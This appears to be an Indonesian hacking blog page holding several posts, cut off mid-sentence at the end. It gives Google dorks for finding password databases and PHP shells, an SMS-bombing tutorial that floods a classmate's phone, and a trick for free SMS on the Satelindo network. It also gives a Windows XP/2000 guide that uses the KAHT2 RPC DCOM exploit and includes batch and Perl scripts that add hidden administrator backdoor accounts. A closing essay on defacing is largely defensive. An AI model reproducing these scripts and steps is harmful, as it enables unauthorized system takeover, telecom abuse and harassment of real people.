http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search

#> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aboleh-hacking.com&btnG=Search

#> safe=off: arti dari variabel ini filter “SafeSearch” dimatikan. “SafeSearch”
untuk memfilter hasil pencarian sexual.

Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri.

Contoh script google.html lengkap dengan variabelnya

- BOF google.html –


Variabel num:

Variabel hl:

Variabel lr:

Variabel as_qdr:

Variabel safe:






- EOF google.html -

Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda,
Berikut merupakan script default pencarian google.

- BOF google.html -







- EOF google.html -

Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com



Tips & Tricks

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.

Ex:
- Keyword: site:boleh-hacking.com, menghasilkan semua site www.yogyafree.net. Kemudian anda bisa mencoba keyword: site:boleh-hacking.com hacker, akan menghasilkan semua site boleh-hacking.com yang mengandung kata hacker.

Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

intitle:index of intitle:mp3 -html -htm name size
intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size
intitle:index of intitle:cgi-bin password -html -htm name size

inurl:”admin.mdb” -html
inurl:”password.mdb” -html
inurl:”data.mdb” -html
“phpMyAdmin” “running on” inurl:”main.php”
intitle:”PHP Shell” “Enable stderr” php


Selengkapnya.....

*NEW* SMS BOMBER INDOSAT

Written by ferry89 on 21.19

Sebel sama orang? wew sering atuh w juga wkwkwkwkwk, tapi yang ini bner bner nybelin tw!

Cek dan ricek ternyata anak sekelas, dan dia pakai im3, hihihihi salah besar dia ngerjain orang kyak w :)

Langsung saja nomor dia w bomb selama satu jam!! wkwkwk ribuan sms pun datang kepada dia :)

Handphone nya hank! sukur mank enak!! wkwkwkwkw, ok to the point.

Persiapan:

1. Browser Mozilla Firefox
2. Addons ReloadEvery download dan install disini
https://addons.mozilla.org/en-US/firefox/downloads/file/467/reloadevery-2.0-fx.xpi
3. Koneksi Kenceng *periphreal*

Langkah:

1. Browse ke http://www.indosatcommunity.com/registration
2. Registrasi saja asal asalan
- Isi username asal asalan
- Password isi asal asalan
- Cocokan capctha
[img]http://i240.photobucket.com/albums/ff307/murraybridge/a.jpg[/img]
3. Setelah registrasi daftarkan MSISDN target Bomb contoh 62856161651 tersedia kotak box 4
[img]http://i240.photobucket.com/albums/ff307/murraybridge/d.jpg[/img]
4. Klik Register
5. Nah disini klik Send Passkey Again disebelah kotak box kosong..
6. Stelah di klik Send Passskey Again akan muncul tulisan Your passkey has been sent!
[img]http://i240.photobucket.com/albums/ff307/murraybridge/b.jpg[/img]
7. Klik kanan di page lalu pilih Reload Every dan Custom kan ke 1 - 2 Seconds..
8. Jika mucul dialog Box, tekan ENTER bukan di klik OK
9. Selesai :) tunggu selama 1 jam / 2 jam tergantung kekeselan kamu :D


Dalam proses pengeboman jangan membuka tab lain yang menuju ke page registrasi IndosatCommunity.com karena akan mengulang cookies kamu dan ternyata setelah di Reload Every ternyata page nya redirect ke step awal..


Target Bomb akan mendapat sms yang isinya

Sender: INDOSAT
Body: Passkey Anda untuk Indosat Community adalah xxxx

Tq...

Selengkapnya.....

CARA SMS GRATIS

Written by ferry89 on 21.07

== BUG SMS SATELINDO ==

Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan
ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon
yang sangat merobek kantong. GSM yang menggunakan teknik switching dengan
memanfaatkan system base station memungkinkan kita bisa mengirim pesan
alphanumeric singkat dari sebuah Handphone ke handphone lain.oke sampe
disini preambule kita akhiri.

Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?,
itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan
sebuah promosi produk yang akhirnya menjadi komersil. Bug yang saya dapatkan pada
akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM.
kenapa satelindo? nomor yang di keluarkan pihak SATELINDO yang baru dengan nomor
eri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi
kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL,
dll tetap bisa dilakukan secara gratis.

cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish

Dari sana kita bisa lakukan dengan sepuas hati.

Penulis Minta MAAF KEPADA:
1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI SATELINDO
2. SEMUA PIHAK YANG TERILHAMI UNTUK MELAKUKAN PERCOBAAN INI
3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.


MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT KITA.

Selengkapnya.....

Backdooring WINDOS XP & 2000

Written by ferry89 on 20.50

== Backd00ring WINDOS XP && 2000 ==



Pengantar

Tulisan ini dibuat untuk membuktikan bahwa sabotase account admin
pada windows juga dapat dilakukan secara lokal, bisa dengan
menggunakan software yang sama, atau bahkan tanpa software sama sekali
tulisan ini juga menyambung artikel yang di buat oleh the_day,
tetapi di khususkan untuk eksploitasi secara lokal .


artikel ini ditujukan untuk :
- buat yang lupa password admin :p
- buat yang mimpi pengen jadi admin :P
- buat yang dendam sama admin karena di curangin :)
- buat yang mau belajar exploitasi windows
- buat yang mau tau kebobrokan windows
- ..... (isi ndiri, kenapa kamu tertarik baca ini)

bahan yang di perlukan :
-sploits RPC DCOM : *kaht2 (for windust)
-atau sploits echokillrpc yang khusus local sploits
-account user biasa or minimal Guest

dari user biasa :

1. ekstrak kaht2 yang dimiliki, biar mudah taruh aja di C:\
terus jalankan :
start > run > command >

masuk ke c:\ipconfig or kalo males pake ip jaringan bisa pake
ip buat loopback yaitu 127.0.0.1

ketik aja:
c:\kaht2 127.0.0.01 127.0.0.1

_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
________________________________________________

[+] Targets: 127.0.0.0-127.0.0.1 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 328
[+] Scan In Progress...
- Connecting to 127.0.0.1
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

2. jalankan echokillrpc.exe

dapatkan c:\windows\sysem32\


masuk deh :D dengan account Administrator

sekarang kamu mau ngapain? bikin backdoor aja or mau buat account baru
admin or jadiin account kamu admin ?

a. bikin backdoor aja :D
kalo ini kamu kudu cari account yang gak di aktifkan sehingga user
tersebut gak terdeteksi pada halaman login user :P
biasanya account Guest yang dibuat tidak aktif padahal masih ada/default
nah kamu bisa jadikan ini backdoor kamu , semisal kamu mau remote or
login biasa :)

gimana caranya ? belajar :P , just kiddding!

kamu ketik sintax berikut ini , bair jelasnya kamu liat dulu account guest
ada apa kagak ? pake sintax net user

C:\WINDOWS\system32>net user

net user

User accounts for \\

------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0 y3dips
The command completed with one or more errors.



(cat : lihat ada beberapa account yang tercipta di situ dan dapat di
manfaatkan :P)

YUPe, ternyata ada account guest, biar jelas apa dia aktif or kagak
kita ketik aje net user Guest

C:\WINDOWS\system32>net user Guest
net user Guest
User name Guest
Full Name
Comment Built-in account for guest access to the computer/d
omain
User's comment
Country code 000 (System Default)
Account active No <=====gak aktif :p
Account expires Never

Password last set 2/29/2004 3:58 AM
Password expires Never
Password changeable 2/29/2004 3:58 AM
Password required No
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/29/2004 3:42 AM

Logon hours allowed All

Local Group Memberships *Guests
Global Group memberships *None
The command completed successfully.

hehehehe, ternyata gak aktif euy..

sekarang kita jadikan backdoor pake perintah

C:\WINDOWS\system32>net localgroup Administrators Guest /add

menjadikan user Guest menjadi group Administrators.

oke! kelar sudah jika kita perlu sekali-sekali maka tinggal memakai
account ini, awas jangan sampai di ambil orang lo...
or mau dikasih password aja, biar lebih asyik :D


b. buat account sebagai admin

setelah dapet command prompt sebagai admin hasil dari eksploitasi dengan
kaht2 atau echokillrpc, maka tinggal jalankan exploits echobacd00r.bat
atau echobackd00r.exe yang dapat anda letakkan pada disket atau telah
copikan ke C:\Windows\system32\

sehingga tinggal ketik

c:\windows\system32\echobacd00r.bat

selesai!!!

atau jika anda tidak menggunakan echobackd00r.bat atau echobackd00r.exe
anda dapat mengetikkan secara manual dengan penggunaan net user dan
net localgroup, untuk detilnya sama seperti pembuatan account admin
pada artikel the_day tentang hacking windows 2000



2 . Ekploitasi karena kelemahan windust apabila saat installasi gak
ngisiin password admin (inget gak!!)

cara termudah adalah kamu masuk ke windows, saat booting tekan
F8, terus pilih safe mode dengan command prompt
setelah itu mausk deh ke account admin, :P

pake command prompt dan perintah net user untuk add user dan
pake sintax net localgroup untuk jadikan user tsb admin ..

cat: terbukti pada beberapa pc yang di install di komputer
tempat bekerja yang ternyata dibiartkan dengan admin yang
tak berpassword :D,
(keasyikan buat click-click duang kali )


3. Eksploitasi lokal dengan menggunakan :
1. Disk bootable,+ echobackd00r.bat/echobackd00r.exe (jika ada)
2. Eksploits kaht2 or echokillrpc

masukkan disket,
apabila masuk ke command prompt maka silakan eksekusi langsung kaht2nya
atau echokillrpc.


selanjutnya tinggal modifikasi account yang ada atau ciptakan account baru
(dapat menggunakan echobackd00r.bat atau secara manual)


cara ini dilakukan jika cara 1 dan 2 tidak bisa di lakukan
(cat : cara 1: account user biasa gak ada, cara 2: account admin
dengan F8 diberi password)

[perintah net user ]

NET USER
[username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]

NET USER creates and modifies user accounts on computers. When used
without switches, it lists the user accounts for the computer. The
user account information is stored in the user accounts database.

This command works only on servers.


username Is the name of the user account to add, delete, modify, or
view. The name of the user account can have as many as
20 characters.
password Assigns or changes a password for the user's account.
A password must satisfy the minimum length set with the
/MINPWLEN option of the NET ACCOUNTS command. It can have as
many as 14 characters.
* Produces a prompt for the password. The password is not
displayed when you type it at a password prompt.
/DOMAIN Performs the operation on a domain controller of
the current domain.
/ADD Adds a user account to the user accounts database.
/DELETE Removes a user account from the user accounts database.

Options Are as follows:

Options Description
--------------------------------------------------------------------
/ACTIVE:{YES | NO} Activates or deactivates the account. If
the account is not active, the user cannot
access the server. The default is YES.
/COMMENT:"text" Provides a descriptive comment about the
user's account (maximum of 48 characters).
Enclose the text in quotation marks.
/COUNTRYCODE:nnn Uses the operating system country code to
implement the specified language files for a
user's help and error messages. A value of
0 signifies the default country code.
/EXPIRES:{date | NEVER} Causes the account to expire if date is
set. NEVER sets no time limit on the
account. An expiration date is in the
form mm/dd/yy or dd/mm/yy, depending on the
country code. Months can be a number,
spelled out, or abbreviated with three
letters. Year can be two or four numbers.
Use slashes(/) (no spaces) to separate
parts of the date.
/FULLNAME:"name" Is a user's full name (rather than a
username). Enclose the name in quotation
marks.
/HOMEDIR:pathname Sets the path for the user's home directory.
The path must exist.
/PASSWORDCHG:{YES | NO} Specifies whether users can change their
own password. The default is YES.
/PASSWORDREQ:{YES | NO} Specifies whether a user account must have
a password. The default is YES.
/PROFILEPATH[:path] Sets a path for the user's logon profile.
/SCRIPTPATH:pathname Is the location of the user's logon
script.
/TIMES:{times | ALL} Is the logon hours. TIMES is expressed as
day[-day][,day[-day]],time[-time][,time
[-time]], limited to 1-hour increments.
Days can be spelled out or abbreviated.
Hours can be 12- or 24-hour notation. For
12-hour notation, use am, pm, a.m., or
p.m. ALL means a user can always log on,
and a blank value means a user can never
log on. Separate day and time entries with
a comma, and separate multiple day and time
entries with a semicolon.
/USERCOMMENT:"text" Lets an administrator add or change the User
Comment for the account.
/WORKSTATIONS:{computername[,...] | *}
Lists as many as eight computers from
which a user can log on to the network. If
/WORKSTATIONS has no list or if the list is *,
the user can log on from any computer.

NET HELP command | MORE displays Help one screen at a time.


: :berikut di cantumkan 2 buah script backd00r

[echobackd00r.bat]

cut here &<-----------------------------------------------------------



rem *echobackd00r.bat
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal
rem *cara pakai, ubah dulu USER="backdoor"
rem *cara pakai, ubah dulu PASS="password"


rem *MULAI.

@echo off
PROMPT $P$G
cls
Color 87
GOto iklan

:setting

rem *ganti USER dan PASS

set USER="backdoor"
set PASS="password"

if %USER%=="backdoor" Goto gagal else GOto proses

:proses

rem *masuk ke perintah tuk nambahin user + passwordnya

net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete

cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70


EXIT

:iklan

rem * just a banner from me :) , bisa di hilangkan :p

echo.
echo #####################################################
echo # #
echo # Echobackd00r #
echo # dibuat dan di coba oleh y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex #
echo # note: ubah USER dan PASS #
echo # #
echo #####################################################
echo.
echo tekan ENTER !!!
pause>nul

Goto setting

:gagal

echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.


rem *SELESAI.
rem *created by y3dips : maret 2004 : http://echo.or.id


cut here &<-----------------------------------------------------------




[echobackd00r.pl > ubah ke exe dengan perl2exe]

cut here &<-----------------------------------------------------------


# echobackd00r.pl digunakan untuk membuat account admin pada Windows XP, 2000
# kombinasikan dengan sploits RPC DCOM seperti KAHT2 dsb
# ubah ke exe dengan perl2exe

#!/usr/bin/perl

printf"\n **********************************************************\n";
print " * *\n";
print " * Echobackd00r *\n";
print " * created && tested by y3dips on XP Operating Sys *\n";
print " * greetz : the_day (untuk idenya), moby, comex, z3r0byt3 *\n";
print " * echo-memberz, newbie_hacker, puji_tiwili* *\n";
print " * *\n";
printf" **********************************************************\n\n";

if(@ARGV == 2)
{

$uname = $ARGV[0];
$password = $ARGV[1];

{
system(" net user $uname $password /add ");
system(" net localgroup Administrators $uname /add ");
system(" net localgroup Users $uname /delete ");
}
}

else
{
print " [Gunakan] echobackd00r.exe username password \n";
}





EOF.


Penutup.
tulisan ini tetap seperti tulisan-tulisan terdahulu yang ditujukan
untuk pendidikan dan bertujuan untuk membukakan mata kita semua terhadap
pentingnya security, segala bentuk penyalahgunaan adalah bukan merupakan
tanggung jawab penulis .

Selengkapnya.....

Hacking = Defacing

Written by ferry89 on 20.43

Mukadimah


"ILmu tetaplah ilmu, walau berbahaya dia tetaplah ilmu yang tak pernah
layak untuk disembunyikan"
[y3dips]


Disclaimer

"Tulisan ini sepenuhnya untuk pembelajaran dan pengetahuan, semua yang
terkandung di dalamnya apabila di salahgunakan akan menjadi tanggung
jawab pribadi masing masing penggunanya."

tulisan ini berlicensi OPENCONTENT!!


Preface

Tulisan ini awalnya aku buat hanya untuk mencatat apa yang aku ketahui
sebagaimana kesenangan ku untuk mendokumentasi 'ilmu' (padahal alasan
sesungguhnya adalah aku itu cukup mudah untuk lupa : P Psssstt ), So
jadilah artikel ini yang aku rasa gak pantas untuk aku pendam sendirian.

walau aku sangat yakin artikel ini gak mungkin bisa 'sempurna', karena
kesempurnaan milik Sang Pencipta. Tetapi aku akan sangat bahagia jika
nantinya temen-temen memberi masukan atau bahkan rela mengeditnya dan
menambahkan secara bertanggung jawab untuk bersama. Adapun yang jadi
alasan kedua aku menulis tentang 'defacing' adalah karena banyaknya
peng-artian keliru dan sedikitnya pengetahuan buat itu, disini aku
sangat berharap tulisan ini meskipun sedikit,dapat memberi manfaat bagi
kita semuanya.

Tulisan ini bukan untuk mengajarkan teknik-teknik secara detil, tetapi
hanya berupa ulasan secara gamblang yang bisa aku ungkapkan dari hasil
pembelajaran yang telah aku dapatkan atau dengan kata lain "tulisan
ini adalah yang aku mampu serap" :P

Maaf apabila tata kata, perbendaharaan kata serta pengetikan tidak sesuai
dengan EYD, apalagi disertai istilah istilah yang "beken" dengan maksud
agar dapat lebih "menyentuh" :P


Semoga tulisan ini bermanfaat bagi semua!


IStilah-istilah :

" Hacking != Defacing "
" Defacing its not an 33137 works but its fun enough "

jargon file (versi 4.4.4) :

keyakinan bahwa "system-cracking" untuk kesenangan dan eksplorasi sesuai
dengan etika adalah tidak apa-apa [OK] selama seorang hacker, cracker
tetap komitmen tidak mencuri, merusak dan melanggar batas2 kerahasiaan.



Main

this site has been defaced
]--------------------------[


DONT CRY!!!



Nothing was harm ! , only your index file was deleted



>gwe<

greetz to: @1




Pernahkah anda menemukan tampilan seperti itu pada halaman sebuah situs
yang pernah anda kunjungi?atau mungkin, berbeda tulisannya saja :P,
itulah salah satu perubahan yang terjadi pada beberapa situs tertentu
atau yang di 'tentukan'.


Pendahuluan.

DEFACE [di'feis] yang berdasarkan kamus UMUM Indonesia~english* yang
aku miliki berarti merusakkan; mencemarkan; menggoresi;menghapuskan

tetapi arti kata deface disini yang sangat lekat adalah sebagai salah
satu kegiatan merubah tampilan suatu website baik halaman utama atau
index filenya ataupun halaman lain yang masih terkait dalam satu url
dengan website tersebut (bisa di folder lain atau di file lainnya)

Defacing sering diartikan hacking bagi sebagian besar masyarakat, baik
pers, awam, bahkan gak sedikit para pencandu IT . herannya lagi citra
inilah yang melekat kepada para 'hacker' yang murni mendedikasikan
hidupnya kedalam budaya hacking. budaya hacking yang jelas-jelas sangat
membangun yang dibuktikan dengan budaya 'opensource' yang berkembang
pesat (aku gak perlu menjelaskan tantang hacking sesungguhnya, silakan
baca baca di artikel artikel terdahulu).

TEtapi tentukah kejadian ini yang membuat istilah 'hacker' bagai tercoreng
oleh perlakuan beberapa 'individu'

satu hal yang perlu diingat:

'im not a hacker yet! but i'll hope i can make it someday '.

agar tidak terjadi kesalah pahaman :)


Beberapa Alasan Defacing.

1. Dendam atau perasaan gak puas*
2. Kenikmatan tersendiri, 'defacer' merasa tertantang
3. Intrik politik, Sosial dsb
4. Penyampaian pesan tertentu
5. Iseng karena gak ada kerjaan dan pengen ngetop
6. prestice dalam golongan
7. .....

sisanya tambahin sendiri ,apabila ada motif yang anda ketahui dan tidak
aku tuliskan, baik motif yang melatarbelakangi anda, saudara anda,
teman anda untuk mendeface :), atau motif-motif yang anda ketahui!


Jenis-jenis pen-Deface-an

1. full of page

artinya mendeface Satu halaman penuh tampilan depan alias file index
atau file lainnya yang akan diubah (deface) secara utuh, artinya untuk
melakukan ini biasanya seorang 'defacer' umumnya harus berhubungan
secara 'langsung' dengan box (mesin) atau usaha mendapatkan priveleged
terhadap mesin, baik itu root account or sebagainya yang memungkinkan
defacer dapat secara interaktif mengendalikan file indek dan lainnya
secara utuh.umumnya dengan memanfaatkan kelemahan kelemahan pada
services services yang berjalan di mesin, sehingga dapat melakukan
pengaksesan ke mesin.

Cara-cara yang ditempuh umumnya sama dengan step-step yang dilakukan
untuk melakukan "hack in to the machine" yang sudah banyak di tulis
dan diterjemahkan bahkan di bahas di artikel artikel yang dirilis
baik secara resmi atau 'underground' . penulis pernah membaca karya
Onno W purbo. (ini yang di inget :) )
so, karena bukan ini yang akan kita bahas pada artikel ini maka,lanjut!

ups !! ntar dulu! caranya boleh sama, hacking, defacing dan cracking,
tetapi! hasil akhirnya yang menentukan apakah itu cracker, hacker or
defacer yang melakukannya. ok!!

..... lanjut!!!.....


2. Sebagian atau hanya menambahi

artinya, defacer mendeface suatu situs tidak secara penuh, bisa hanya
dengan menampilkan beberapa kata, gambar atau penambahan script script
yang mengganggu, hal ini umumnya hanya akan memperlihatkan tampilan
file yang di deface menjadi kacau dan umumnya cukup mengganggu,
defacer biasanya mencari celah baik dari kelemahan scripting yang
digunakan dengan XSS injection (bisa merefer ke artikel yang di buat oleh
theday at http://ezine.echo.or.id) , bisa dengan SQL atau database
injection dan juga beberapa vulnerabilities yang seringkali ditemukan
pada situs situs yang dibangun dengan menggunakan CMS
(content Manajemen System)

berbagai contoh XSS dapat di lihat di berbagai web, atau bisa dilihat
di http://forum.echo.or.id bagian proof of concept disitu terdapat
beberapa contoh XSS dan metoda lainnya yang ditujukan untuk "pendidikan"
saja (pembuktian !! ).


Defacing umumnya dapat terjadi dikarenakan:



1. Kesalahan konfigurasi

Setiap kali aku membaca buku, artikel ataupun literatur tentang
'security' maka hal ini yang selalu di letakkan sebagai peyebab
utama kelemahan suatu sistem yang telah di ciptakan;

pernah dengar kata kata " firewall yang tidak di konfiguraskan
dengan baik bukanlah merupakan firewall"

jadi tidak peduli software apapun atau sistem apapun yang di akan
terapkan! maka apabila tidak di konfigurasikan dengan baik malah
akan menjadi 'bumerang' bagi sistem itu sendiri.bisa jadi sesuai
dengan istilah 'pagar makan tanaman' :P

+ cara menanggulanginya

Ada baiknya berhati hati dalam mengkonfigurasi, sesuaikan semua
kebutuhan dengan peripheral + SDM yang dimiliki untuk dapat
dihasilkan semua policy yang dahsyat!

2. kelalaian admin

Apabila Konfigurasi telah sesuai, maka faktor ' man behind the gun'
yang akan berbicara banyak; sehingga faktor internal kedua adalah
manusia yang menggelola server tersebut: adpun jenis kelalaian yang
dapat terjadi adalah :


- install file && folder
webmaster atau admin biasanya lalai dalam menghapus file
yang digunakan untuk menginstallasi portal web model CMS
ex : folder /install,dan file install.php pada phpnuke,
postnuke, phpbb, dsb

+ untuk menanggulanginnya : ada baiknya seorang administrator
membaca manual (kerjaan admin!!) modul CMS yang di gunakan
dan melakukan uji silang (cross check) alias "posisikan anda
sebagai attacker"


- file konfigurasi && permision
webmaster atau admin lupa mengatur permisi pada file file
konfigurasi yang penting, yang menyangkut administrasi dan
konfigurasi file, khususnya file-file yang mencatat
password, baik password database dsb.

ex: file config.txt, config.php, config.inc

+ untuk menanggulanginya
biasanya di gunakan perintah chmod pada file dan folder
chown dan chattr


- run of date
Terlalu lama peng-update-an suatu web atau tidak secara
terus-terusan mengupdate webnya khususnya portal yang dibundel
dalam CMS, serta juga packet packet yang terinstalasi di mesin
baik itu web server sendiri , database server dan sebagainya
yang bisa menjadi pintu masuk bagi 'defacer'.

+ untuk menanggulanginya, anda cuma perlu rajin rajin dan rutin
menggunjungi situs situs yang menyediakan update dari packet
yang digunain. (yang jelas OL mulu man!!!)

- run of services
kesalahan konfigurasi terhadap services/layanan yang diberikan
khususnya terlalu banyak menjalankan layanan yang tidak
diperlukan pada setiap server.

services ===> port

semakin banyak layanan yang di jalankan maka akan semakin
banyak port yang di gunakan untuk melayani layanan tersebut,
sehingga semakin banyak yang perlu diperhatikan. Pengkerucutan
atau minimalisir layanan adalah cara yang dapat di lakukan.

+ cara menanggulanginya
Audit semua sistem anda sebelum di 'launch' cek semua services
yang berjalan dan sesuaikan dengan kebutuhan!


- cannot keep secret
berkaitan dengan "social engineering", maka kepercayaan adalah
hal terpenting, "TRusT NO BODY" mungkin pilihan yang sangat
masuk akal dalam menanggulangi hal ini.
Pribadi dan mental seorang webmaster atau admin sangat
menentukan!

+ cara menanggulanginya , keep your own secret alias "inget man!!
lo tu admin! bukan tukang gosip yang EMBERRRR" :P

- Kurang berhati-hati saat login ke mesin dsb
Sniffing yang dilakukan dari jaringan lokal sangat berkemungkinan
untuk mendapatkan password yang di pakai oleh r00t, admin,
webmaster dsb.

+ cara menanggulanginya

setting server anda untuk menolak melakukan login baik remote
dan lokal untuk tidak menggunakan r00t ( tau gak caranya? kalo
gak!! berhenti aja jadi admin :P ), gunakan perintah substitute.
untuk login secara remote upayakan penggunaan SSH dan SSL,
beberapa konfigurasi mungkin dapat berguna untuk menanggulanginya,
baik konfigurasi pc yang boleh akses remote baik berdasar ip,
konfigurasi di jaringan, firewall dsb

- etc, goes here (lain-lain tambah disini :P) ...

3. pengkhianatan

Apabila anda sering membaca, mendengar atau berdiskusi tentang
berbagai kebocoran akibat 'social engineering' yang dilakukan,
mungkin hal ini sudah menjadi maklum bagi anda semua.Apalagi
bagi anda yang pernah membaca buku 'art of deception' karangan
kevin mitnick maka anda akan memahami betapa besarnya kebocoran
yang tercipta dari penggunaan metoda tersebut.Bayangkan jika
hal tersebut terjadi dikarenakan unsur kesengajaan ?

Mungkin terlalu sangar juga kata kata itu (hehe), tetapi apa
boleh buat, hal ini pernah terjadi bahkan sering terjadi.
mungkin juga beberapa intrik politis dan sosial sudah bergabung
didalamnya, so sangat mungkin hal ini terjadi.adapun beberapa
individu yang mungkin terkena :

1.Administrator
2.Second Admin /Staff
3.WebMaster
4.User yang terdapat di mesin Server
5......

Kenapa hal ini aku masukkan, padahal lebih nggak teknis (embeer)
ini juga patut di waspadai lho, beberapa persen kasus terjadi
di karenakan oleh perbuatan orang 'dalam'

+cara menanggulanginya

seperti perkataan teman saya , z3r0byt3 : "TRUST NO BODY" :P :)
mungkin berguna buat anda semua. ( udah 2 kali di sebut neh :P)






1. sofware vulnerabilities

Apa itu software Vulnerabilties ?

Software vulnerabilities disini adalah kelemahan, atau kesalahan yang
dimiliki oleh software/program yang dipakai baik secara sengaja
atau tidak sengaja.

Khususnya software-software Open source / atau yang berlicensi GPL,
maka tidaklah aneh apabila dalam hitungan hari, atau malah jam dapat
diketahui kelemahan suatu software. Banyak situs yang membahas dan
melaporkan vulnerabilities suatu software baik itu situs resmi
software tersebut atau situs situs keamaanan, info ini bisa menjadi '
senjata ampuh bagi para 'defacer' atau bahkan bisa menjadi perisai
ampuh bagi webmaster atau admin.

+ cara menanggulanginya

jangan jadi kuper!! alias rajin rajin browsing untuk menggunjungi situs
resmi software software yang anda gunakan , baca berita 'security'
buatlah ikatan antara diri anada dengan komunitas opensource yang kamu
pakai secara khusus dan komunitas opensource secara umum. sehingga
kamu gak merasa di tinggalkan.
jangan takut!! bisa jadi kebocoran itu ditemukan tetapi dlam waktu cepat
juga bisa ditemukan 'obatnya' :P

lakukan semua langkah langkah penting, apakah menonaktifkan fiture atau
fasilitas tertentu yang dijalankan; yang diketahui 'bolong' dan belum
dimiliki atau di temukan patchnya.
atau diskusikan!! you have the community now!


2. sistem vulnerabilities

Sistem vulnerabilities?

mungkin hanya penggunaan kata yang sedikit pribadi sehingga memisahkan
sistem dan software. pemisahan ini hanya agar membuat kita lebih jelas.
baiklah!, apa yang aku maksud sistem disini adalah ? bisa disebut
sistem operasi dari server khususnya 'kernel' yang dikembangkan oleh
pengembang khusus kernel (http://kernel.org) sehingga bukannya tidak
mungkin kebocoran ini di perbaiki oleh selain developer, tetapi umumnya
untuk semua OS yang di gunakan (apalagi win****) maka versi 'stable'
lah yang di tunggu tunggu!

kenapa? apabila kita menggunakan Bind dan ternyata tidak stabil kita bisa
gunakan DJBDNS, kalo postfix masih vulnerable kita bisa cepat cepat beralih
ke qmail, tapi kalo kernel belum stabil maka?

vulnerablenya suatu kernel biasanya berpengaruh pada versi versi dibawahnya
sehingga kemunggkinan penggunaan kernel versi lain pun akan mustahil.

kasus seperti ini cukup jarang, umumnya cara yang ditempuh bisa dilakukan
secara lokal /local exsploit (kasus yang terjadi baru baru ini : mremap)
kecuali* exploitasi pada 'DCOM RPC' yang berakibat kesalahan itu bisa
di eksploitasi secara remote dan berbahaya sekali bagi mesin dikarenakan
akan memberikan akses administrator (baca eksploitasi pada DCOM RPC win*)


+ cara menanggulanginya

1. seperti biasa pergi ke situs penyedia sistem operasi (kernel) untuk info
dan patch yang disediakan
2. ke situs-situs 'security , cari kelemahannya usahakan melakukan
penanggulangan semampunya.
3. Diskusikan di komunitas


3. run of control

Run of control disini aku maksudkan sebagai suatu kesulitan untuk melakukan
Kontrol terhadap beberapa metoda serangan tertentu oleh administrator , hal
ini bisa dikarenakan penggunaan beberapa fasilitas atau metode serangan
yang cukup relatif sulit untuk di elakkan.

serangan-serangan ini sangat umum di ketahui, diantaranya:

1. Brute forcing

Brute force attack adalah jenis serangan yang dilakukan dengan melakukan
berbagai bentuk kombinasi karakter yang akan di cobakan sebagai password
